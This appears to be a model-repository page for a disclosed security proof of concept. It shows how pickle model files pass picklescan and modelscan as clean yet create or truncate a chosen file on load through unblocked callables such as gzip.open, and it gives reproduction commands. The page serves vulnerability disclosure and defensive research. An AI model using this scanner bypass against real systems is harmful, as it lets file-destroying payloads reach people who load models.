Pickle Scanner Bypass β arbitrary file creation/truncation via unblocked file-open callables (security PoC)
Benign huntr MFV research PoC. A model passes picklescan 1.0.4 and modelscan 0.8.8 as
clean, yet on load creates/truncates an attacker path via a write-mode file-open callable that is
missing from both denylists: gzip.open, bz2.open, lzma.open, wave.open, mailbox.mbox.
model.pkl/model.ptβ primary PoC (gzip.open) creating/tmp/huntr_poc_file_write_familymember_<name>.pklβ one file per family member for independent verification
pip install picklescan modelscan torch
python -c "from picklescan.scanner import scan_file_path as s; print(s('model.pkl').infected_files)" # 0
modelscan -p model.pkl # No issues found!
rm -f /tmp/huntr_poc_file_write_family
python -c "import pickle; pickle.load(open('model.pkl','rb'))"; ls -l /tmp/huntr_poc_file_write_family
Reported by hacnho. Payload only creates a benign marker file.
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support